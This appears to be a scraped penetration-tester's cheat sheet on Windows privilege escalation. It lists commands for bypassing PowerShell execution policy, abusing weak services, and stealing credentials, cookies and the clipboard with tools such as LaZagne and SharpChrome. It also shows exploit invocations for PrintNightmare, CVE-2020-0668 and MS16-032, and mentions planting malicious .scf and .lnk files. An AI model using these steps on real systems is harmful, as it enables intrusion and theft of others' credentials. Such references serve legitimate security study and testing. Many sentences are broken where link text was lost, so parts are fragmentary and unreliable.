Windows
Last updated
Last updated
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
Get-Content .\PrivescCheck.ps1 | Out-String | IEX
LOLBAS shows how to exploit vulnerabilities on known programs to perform privileged actions.
Privileges should be displayed possibly with privileged shell.
They should be activated with EnableAllTokenPrivs.ps1.
Hyper-V Administrators
Feature that enables a consent prompt for elevated activities. When UAC is enabled, applications and tasks always run under the security context of a non-administrator account unless an administrator explicitly authorizes these applications/tasks to have administrator-level access to the system to run. UAC has various integrity levels ranging from low to high.
Check if UAC is enabled.
Compile UACMe with Visual Studio to get akagi.exe.
Check version and obtain Build
Search for the Key based on the Build number in the github
.\SharpUp.exe audit
Using icacls we can verify the vulnerability and see if we have full permissions to the directory.
At this point we can replace service binary with malicious binary generated with msfvenom.
Start Service.
Next, we'll use AccessChk from the Sysinternals suite to enumerate permissions on the service.
We can use our permissions to change the binary path maliciously.
Start service.
If the path of a binary file of a service contains one or more spaces and is not enclosed in quotes, it can be interpreted in various ways by Windows. It starts from left to right and stops at each space, adding .exe. So if we can put a binary file in one of these subdirectories and restart the service, then our binary will be executed.
Although it's not uncommon to find applications with unquoted service paths, it isn't often exploitable.
We can identify unquoted service binary paths using
Or with PowerUP (PowerSploit or Empire)
It is also worth searching for weak service ACLs in the Windows Registry, with AccessChk from the Sysinternals suite
We can abuse this using
We can use WMIC to see what programs run at system startup. Suppose we have write permissions to the registry for a given binary or can overwrite a binary listed. In that case, we may be able to escalate privileges to another user the next time that the user logs in.
Search for sensitive information in different files
Look for readable configuration files in which passwords can be saved.
The user can add words to their dictionary to avoid the distracting red underline, including passwords.
Administrators often need to create automated scripts for users that also contain credentials. The credentials are encrypted and protected via DPAPI, which typically means they can only be decrypted by the same user on the same computer they were created on.
Example script
If we have gained command execution in the context of this user we can recover the cleartext credentials
Copy them to your system and open them with DB Browser for SQLite, or with PSSQLite on the target
KeePass, 1Password, Thycotic, CyberArk, etc.
Crack with hashcat 13400.
We can get SYSTEM, SAM and SECURITY files.
Search for passwords saved in the system.
It searches for passwords.
laZagne.exe all
Extract saved PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP credentials.
Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Target <MACHINE, es.WINLPE-SRV01>
It searches for passwords and interesting file.
.\snaffler.exe -s -o snaffler.log [-i]
Retrieve cookies and saved logins from Google Chrome.
.\SharpChrome.exe logins /unprotect
Retrieve Chromium data, such as cookies, history and saved logins.
PowerShell script which uses reflection to load SharpChromium.
Import-Module .\Invoke-SharpChromium.ps1
Invoke-SharpChromium -Command "cookies <SITE>"
If we have a path error, copy the cookie file path that contains the database to the location SharpChromium is expecting.
Extract cookies from the Firefox cookies.SQLite database.
Copy and transfer the DB with cookies to the attacking machine.
copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .
Connect with RDP GUI or with runas
Windows Autologon allows a system to automatically log on to a specific user account, without requiring manual input of the username and password at each startup.
The username and password are stored in the registry, in clear-text.
Autologon.exe from the Sysinternals suite encrypt the password as an LSA secret.
For Putty sessions utilizing a proxy connection, when the session is saved, the credentials are stored in the registry in clear text.
if we had admin privileges, we would be able to find it under the corresponding user's hive in HKEY_USERS.
Check environment variables for sensitive information such as passwords or misconfiguration.
Often administrators clean the history only with Clear-History, but this is not enough as it only cleans the Get-History, but the history can be found with PSReadline.
Unfortunately, we cannot list out scheduled tasks created by other users (such as admins) because they are stored in C:\Windows\System32\Tasks.
Perform an analysis if there are files that can be the target of Scheduled Tasks by Administrator.
LoadLibrary
Manual Mapping
Reflective DLL Injection
Some services/applications may allow us to escalate to SYSTEM. Enumerate the installed applications carefully and check if they contain vulnerabilities.
Druva inSync 6.6.3
You can add /v AlwaysInstallElevated
Create msi payload with msfvenom and run it on target.
Or use Write-UserAddMSI in PowerUP (PowerSploit or Empire)
It is possible to utilize windows dialog boxes (with features like Save, Save As, Open, Load, Browse, Import, Export, Help, Search, Scan, Print, etc.) as a means to bypass the restrictions imposed on users when browsing directories.
In File Name with All Files in File-Type.
With smbserver on the attacker
Due to the presence of restrictions within the File Explorer, direct file copying is not viable.
An alternative approach involves: right-clicking > run
Where the executable will open a terminal, as it is the following:
See resources1, resources2
Searching through email in a Microsoft Exchange environment for specific terms.
Stealing the clipboard
Import-Module .\Invoke-Clipboard.ps1
Invoke-ClipboardLogger
In $env:RESTIC_PASSWORD is saved the password that is used for backup, if it is not present it will be requested each time.
restic.exe -r E:\restic init (init backup directory)
restic.exe -r E:\restic\ backup C:\FolderToBackup
--use-fs-snapshot to create a Volume Shadow Copy for files actively used
restic.exe -r E:\restic\ snapshots
restic.exe -r E:\restic\ restore <ID> --target C:\RestoreHere
Capture sensitive information from live network traffic, with tcpdump
Sniffs sensitive data from interface or pcap
When getting a shell as a user, there may be scheduled tasks or other processes being executed which pass credentials on the command line. This script captures process command lines every two seconds and compares the current state with the previous state, outputting any differences.
If there are public folders that are also accessed by other users and that we have write permissions to, we can insert an .scf file that is executed every time the folder containing it is opened.
Using SCFs no longer works on Server 2019 hosts.
We can get the same effect as SCF using a malicious .lnk file.
We can use various tools to generate a malicious .lnk file, such as Lnkbomb, or we can run this code.
Exploit Kernel Level. Depends on Kernel Version and Operating System. May cause crashes!
Examine the installed update and search KB (Microsoft Knowledge Base ID number) in Update Catalog
PowerShell script to quickly find missing software patches.
Import-Module .\Sherlock.ps1
Find-AllVulns
Enumerate missing KBs and suggest exploits.
Windows Exploit Suggester.
Python script for detect potential missing patches.
python2.7 windows-exploit-suggester.py --update
Save systeminfo output from target windows system.
python2.7 windows-exploit-suggester.py --database <DB.xlsx> --systeminfo <SYSTEMINFO.txt>
CVE-2021-1675 CVE-2021-34527
CVE-2020-0668
CVE-2019-1388
CVE-2016-0099 MS16-032
. In .
PowerUP ( or )
powershell -ep bypass
. .\PowerUp.ps1
See .
with (see )
Used to manage and connect to remote systems using VNC, RDP, SSH, and similar protocols.
%USERPROFILE%\APPDATA\Roaming\mRemoteNG\confCons.xml (take password in <NODE>)
Use
mremoteng_decrypt.py -s "<PASSWORD>"
mremoteng_decrypt.py -s "<PASSWORD>" -p <MasterPass> (try brute force MasterPass with wordlists and foreach)
PrintNightmare
that execute a malicious DLL
in powershell implementation
Check if the Spooler service is running
ls \\localhost\pipe\spoolss
Exploit with Version2
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"
Privilege Escalation with or , or with service that runs in the context of SYSTEM and is startable by unprivileged users.
Ex. with <PATH> = C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Check permission with icacls <PATH>
Get 2 malicious.exe and renames with the name of the service exe.
.\CVE-2020-0668.exe <MaliciousExe1> <PATH>
Check permission with icacls <PATH> (all F)
Since MaliciousExe1 is no longer a valid, exchange it with the second
copy /Y <MaliciousExe2> <PATH>
Now run the malicious file as system
net start <SERVICE.exe>
Use that contains a certificate with the SpcSpAgencyInfo field populated with a hyperlink.
Right Click on hhupd.exe > Run as administrator
> Show information about the publisher's certificate > General > Link on "Issued by" and close (now we have a browser open as system)
Right Click on browser > Save as > c:\windows\system32\cmd.exe in the path
Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032
